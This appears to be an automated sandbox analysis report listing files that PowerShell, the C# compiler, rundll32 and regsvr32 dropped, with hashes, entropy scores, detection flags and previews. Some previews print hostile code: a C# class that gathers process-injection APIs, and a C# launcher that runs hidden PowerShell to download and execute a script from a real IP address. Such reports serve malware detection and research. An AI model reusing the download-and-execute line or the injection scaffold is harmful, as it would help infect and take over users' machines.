                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.j.t.z.e.y.v.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.j.t.z.e.y.v.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):10583
                                                          Entropy (8bit):4.487855797297623
                                                          Encrypted:false
                                                          SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                          MD5:B022C6FE4494666C8337A975D175C726
                                                          SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                          SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                          SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                          Malicious:false
                                                          Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):206
                                                          Entropy (8bit):4.970752981659629
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2L/6K2CHhJ23fEu5XLGzxszICHhJ23fEu5XLhx:p37L/6KidaZdNx
                                                          MD5:14721CDB509279BF52800DAC7772CC07
                                                          SHA1:12025E72AAFC811BDBDD714EE940A86147984E17
                                                          SHA-256:C0795DBADE5849E1B42072B9C8C2EDC9F2636979EB6D84A3F2C6BD8C3EEC8C0F
                                                          SHA-512:6F53F44435FF01D2EE512217C7E055E9930B052344C620CE201530A9DB34E6A4784DA23BC0990AA126CAE605BDC4F3BDF41B42F10F659FE1984A7FC17E68E735
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.0.cs"
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8704
                                                          Entropy (8bit):4.66104726414492
                                                          Encrypted:false
                                                          SSDEEP:96:zbuaQZGQf9xPQ2pCa/u67hHJK9IhbpPrjzKcaEZRyH0ljILHqrv5MqJTzeNc+i4K:zCaQHf9WDa/u6PRj2caVUxd5Mq5eNcV
                                                          MD5:D5CD7151A0483D4BBEBA33109953A968
                                                          SHA1:B855A270893EBD87F306639EE121C2B2CEC69C60
                                                          SHA-256:247B9D5359A42D67652ADB01203071C68837C732D5E2A1B9B6D45F01C63662AB
                                                          SHA-512:53C86B8C43F9D4A9F6128EA29972A11DEF93EC776D0784C8467AAC0045C3603A1B8C5C945F84B2E86775298D9EA9C9A46CF8E797B005485CE4CBEAF5B0F55997
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):705
                                                          Entropy (8bit):5.242503802577424
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L/6KidaZdNUKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdn6KidmdNUKax5DqBVKVrdFAMBJTH
                                                          MD5:39BC8B70E3043AFE02773B166941B501
                                                          SHA1:A7BFD11C63F79E85ADA9E4210AEB45F9AABB0212
                                                          SHA-256:C9D33D9D9A26EB573256CEA9FC1F0A00FB0FAC42ECB47041832676C5448C8AEB
                                                          SHA-512:9AE18DE867972501BB2A01728F7DE32199FDB310960A3275B77A9CBD4D5FE6EFDF8F02DEFEE72A7E4F9305F474BC8B6ECBA0E4B46F2F47E63E66D0F333A282DF
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0928674045561166
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCGak7Ynqq5XPN5Dlq5J:+RI+ycuZhN4GakS5XPNnqX
                                                          MD5:FB3536B0D566D3D46ABFAA7ED62832E7
                                                          SHA1:98B2070D6A2228FEFCE3D89147C3B6F584C3493D
                                                          SHA-256:C77DF27630B306C5551CC356B841C37B379E52063F8A9E15C6EE8E01635DF84E
                                                          SHA-512:60F0B28611B3F74F005554F761F0BD92F39C92C302D6A5A401C4B31E4BC5EDE7366A40C949DF2E8B5D3C2F0338058343E729EAB13A5136FDA1DDC6939FD976F9
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.e.j.l.a.b.p.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.e.j.l.a.b.p.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):10583
                                                          Entropy (8bit):4.487855797297623
                                                          Encrypted:false
                                                          SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                          MD5:B022C6FE4494666C8337A975D175C726
                                                          SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                          SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                          SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                          Malicious:false
                                                          Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):206
                                                          Entropy (8bit):4.905676278124399
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2L/6K2CHhJ23fWzxszICHhJ23fFyA:p37L/6KiuZNyA
                                                          MD5:659276E535A7A04CCA2346AC4A0CD67E
                                                          SHA1:8A6C5152E91DD883DAF2F743D3D72690BA45083B
                                                          SHA-256:21DDBFE40A50907D12930E5274A2CF2D56D92A55A4CC09F211FE6AA9E4CD3018
                                                          SHA-512:7DEC0664EF81204133CD1BAA766D8CB98DC10A15F5ADB12BBCA51098ACD54562486CA2C4B5324AE38CE7DB9631561A54808DF12A8D640BE1ACF409140AC350B6
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.0.cs"
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8704
                                                          Entropy (8bit):4.658402439364922
                                                          Encrypted:false
                                                          SSDEEP:96:hbuaQZGQf9xPQ2pCa/u67hHJl9IhbpPrjzKcaEZRxH0ljILHqrv5MqrhTzeNc+ic:hCaQHf9WDa/u6eRj2ca+Uxd5MqteNc4
                                                          MD5:F70950FBE761A321F6BA0F9F0C3C6C2C
                                                          SHA1:CC7A44B109C7991388F32A9D78375BC9B37350CC
                                                          SHA-256:6885F1B52833738FC2BE8CFF3C89F81488E5FE8B5E392BCAE81C715D3844BB20
                                                          SHA-512:43D87283A5FEE19A2AFA7D62C2F8547A0A33F23BCF1EECBA90D4F35FDF07F0593AA3BD867CDE943D968813F805852DAAC41FF7056FDEDCFCDCB5E9B554659457
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):705
                                                          Entropy (8bit):5.22736587693707
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L/6KiuZNy1KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdn6KiSCKax5DqBVKVrdFAMBJTH
                                                          MD5:1EE9BF39777EA1E92E36382BAFD5B700
                                                          SHA1:96B3340130626881363F952FB06468518852CCE2
                                                          SHA-256:2E654DD345850567D84F4F730E8E2EACD11F257EEA4F46634846CB832524900C
                                                          SHA-512:07A35A73D6B5D33FDD4E8014E9D73655CE5B08581D09495D3DE6D02DBEB3CF4F1EFED44F063BB7F842DEE3821E579AF900FC7E8739DB1B25629CC656E49016C0
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0956467865818293
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzGak7YnqqIXPN5Dlq5J:+RI+ycuZhNpGakSIXPNnqX
                                                          MD5:EBE6E5DB4E32E7684CC2776C2F074837
                                                          SHA1:9FFC96FB9A3D9AE20BF839C6EAA4A8502EBCF371
                                                          SHA-256:D3F8248430187792CFCCD388AE00F1487F670279D96204B7877C09672D988360
                                                          SHA-512:0B49ACC1BA6C5A9535A9BD53A76438B1F7923A4B0AEF36703B06212876EE4D418A4D27FF41CDC08FCC5E7183C07E08BC96BC2159E159F2CB1BFB0521FE04BDF6
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.c.v.5.n.2.s.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.c.v.5.n.2.s.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):10583
                                                          Entropy (8bit):4.487855797297623
                                                          Encrypted:false
                                                          SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                          MD5:B022C6FE4494666C8337A975D175C726
                                                          SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                          SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                          SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                          Malicious:true
                                                          Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):206
                                                          Entropy (8bit):5.060678924711215
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2L/6K2CHhJ23flZXUzxszICHhJ23flZBn:p37L/6KifXUZfBn
                                                          MD5:7207CEE83E4A2E084F245404175D6646
                                                          SHA1:4A8A81357D6A7DD28F87C0201E554FEC4B177069
                                                          SHA-256:F05E207C4621DFB6396E8CFA4C443FC12074498CA49DBD6AAA5EB7763D2E512B
                                                          SHA-512:356F778B3398159DC58FA3B59AAA5F623A7B0F0693DF35B4BB302D2BF18FCDE264352CAD497D137A4659B8D7AAF01C6D1F0F15EB7C788CA1F0DD6F740C279999
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.0.cs"
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8704
                                                          Entropy (8bit):4.659611677125934
                                                          Encrypted:false
                                                          SSDEEP:192:FCaQHf9WDa/u6tRj2cazUxd5Mqy0seNcb:6WDlw95i05Mqn/yb
                                                          MD5:360C4654FE8D27AE3120FD49665544F8
                                                          SHA1:B50A1FEBD1DA1F16FA108C6233C3EB229C9926AD
                                                          SHA-256:136DCE149EBE0F1B93AC4E33E9F690198172E95EDBB5F625749B67712D258ECB
                                                          SHA-512:83444E177E241277101B08BFC518B906FBD83568988E57E209697F7B047E51F6CC38041EECCB02885C549E847CAC245488E4263CDC6F2AAE5D4789A3C97FEC37
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):705
                                                          Entropy (8bit):5.222459946656785
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L/6KifXUZfBuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdn6KifXMfkKax5DqBVKVrdFAMBJTH
                                                          MD5:41B10FCE25C40F5DD3E290A4B2569544
                                                          SHA1:054D84D4485B0F72AD82AF423C51AC3060B3CF5D
                                                          SHA-256:16A5287E678960938C9B854F709F7D22B2068739F61D863FFA54CD5ED177BF69
                                                          SHA-512:C3FD4A8CAC98CC0795170BFD3B757BE8B3573D0B53CD75F0D7089E36613D8A94EDD832EFDDEEBB5880CF47586B0B8D14EF1AF5A0B4FD78209B48F2349EB2EB19
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.109708838713356
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCYak7YnqqJNPN5Dlq5J:+RI+ycuZhN1akSzPNnqX
                                                          MD5:7ED8ED21A61A5FB430E1DFD39D27F332
                                                          SHA1:DBAEA1BCC4F004ADF6634B7147DFF868572960D0
                                                          SHA-256:B52005BAC6B4FE728F4AB498FE5CFEA22823277CE0D4EE23853A81F0C6FE686B
                                                          SHA-512:3F75E90D3C28C19C30CC56BD5DF049C0B2B3356B3A66973E018F2D92E006507CE9598CECB1830938A6F0B8A829DAB65F74C56BEDFA842A7F310A1EC271EDC917
                                                          Malicious:false
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):724
                                                          Entropy (8bit):4.782753816020807
                                                          Encrypted:false
                                                          SSDEEP:12:V/DTLDauCiQnFOd6FTtf8FkxmaTqTy2dn7+o0zNLmiRSLFUQCL:JjbCiKFc6FowJ2xaoiN3RGUNL
                                                          MD5:99382B41100168F76538CFBD7C420DE5
                                                          SHA1:8C4097E9A57C6CD198C39DC42EF913F14263D211
                                                          SHA-256:096719AB4C6A1F5BAE559122034A423DBCEAF015653FD567263704015D2A2099
                                                          SHA-512:225CEE697ACB1972EBCB1C4E131EA254E6C6D60BE0DA0476D99FA4275C92FBEB27556B74540AD15B007E23B09F621805F4C759D9701BAAD386C9A179C58332FD
                                                          Malicious:false
                                                          Preview:.using System;.using System.Diagnostics;..namespace iviewers.{. class BitmapColorPixel. {. public static void StartBitmap(). {. ProcessStartInfo startInfo = new ProcessStartInfo. {. FileName = "powershell",. Arguments = @"-Command ""iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex""",. WindowStyle = ProcessWindowStyle.Hidden. };.. using (Process p = Process.Start(startInfo)). {. p.WaitForExit();. }.. Environment.Exit(0);. }. }.}.
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):185
                                                          Entropy (8bit):4.978571371837321
                                                          Encrypted:false
                                                          SSDEEP:3:0HXEXA8F+H2R5BJ1RCHyg4E2J5xAIrG3fFGqiQCIFRVRMxTPICHyg4E2J5xAIrGw:pAu+H2LnCHhJ23fSv8qzxszICHhJ23fz
                                                          MD5:470ADC0FC254207480AA1FBB813E7F9F
                                                          SHA1:717512F32DF8A1A2D511A21AF29987EDC3D0943A
                                                          SHA-256:0E75466F00CE89C1565C09A5DC4182BC7E40E2BEB53DD6DD084DAF3FDF2D6164
                                                          SHA-512:B80A942E70AF5006F8E723E2DEB299CA00C72EE61C834217F952F0AA09EEF6201D36C1DBEC63FDFFB19BA435C1B744D35CBD7A2D6202100510E19D4105E5857A
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.0.cs"
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):2.9606062932641435
                                                          Encrypted:false
                                                          SSDEEP:48:6U1gJHpAUx0JNlbo7jhIB/4DMPvf/v1ul1a35q:IAUd790rP3Y3K
                                                          MD5:5CC857B37383E17E9DF41D4BB2117E19
                                                          SHA1:A73D88B6D9AECAFFE1C6C4357493B78A4126D5FE
                                                          SHA-256:1DBD6CC7CC8C77A906114BF79749BEEFF4A4F019DBAA576A09C2842B8D479F93
                                                          SHA-512:FB0056C827DA8003082D9F2B8D59E91ED7A3ADFFC241FEFEF6C735F5877D3C041FE3C5EBD24BC0A4E7DF78CEC3751CC4A97C5AF21654EE67578B9B03923C04DD
                                                          Malicious:true
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):684
                                                          Entropy (8bit):5.2506935777804165
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L560qZ60h4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdB60260h4Kax5DqBVKVrdFAMBJTH
                                                          MD5:F13244480E67538C1D9BCC7DDF5817C9
                                                          SHA1:3F489022BFAFB0041D69DFF0737D6F9A0CFB23A5
                                                          SHA-256:C37C0C668537FB9DF838F02BDBC15C96EABE0732DC63899529B18E1E9E4785C7
                                                          SHA-512:31249352E8FECD956F38C15458F3DABA0B36F84838A0925497C1204534D8323EC3EB8F9EA4D76DF0F363AD8372C0436E3F408DCEB4BCD210335189410086E93D
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0905578282271082
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7YnqqrPN5Dlq5J:+RI+ycuZhN9akSrPNnqX
                                                          MD5:46E80826969C3B21ED5C444F4CC5DC04
                                                          SHA1:8C092EEE34DE3761E4A6A1BB95B36820D35A4089
                                                          SHA-256:8DB3360D1A1CA03B292774CE6F7B539C3A9D0E7048503CF2093113C6E074602E
                                                          SHA-512:00E6078C9D7E88D0C5570AF097D45B9D7B747ECA09EDC7ABE542ADBE87050ADC3376D0CF138A39D2D613C87256E1CB6D20B2409C1241473EDD270C8222609827
                                                          Malicious:false
                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):724
                                                          Entropy (8bit):4.782753816020807
                                                          Encrypted:false
                                                          SSDEEP:12:V/DTLDauCiQnFOd6FTtf8FkxmaTqTy2dn7+o0zNLmiRSLFUQCL:JjbCiKFc6FowJ2xaoiN3RGUNL
                                                          MD5:99382B41100168F76538CFBD7C420DE5
                                                          SHA1:8C4097E9A57C6CD198C39DC42EF913F14263D211
                                                          SHA-256:096719AB4C6A1F5BAE559122034A423DBCEAF015653FD567263704015D2A2099
                                                          SHA-512:225CEE697ACB1972EBCB1C4E131EA254E6C6D60BE0DA0476D99FA4275C92FBEB27556B74540AD15B007E23B09F621805F4C759D9701BAAD386C9A179C58332FD
                                                          Malicious:false
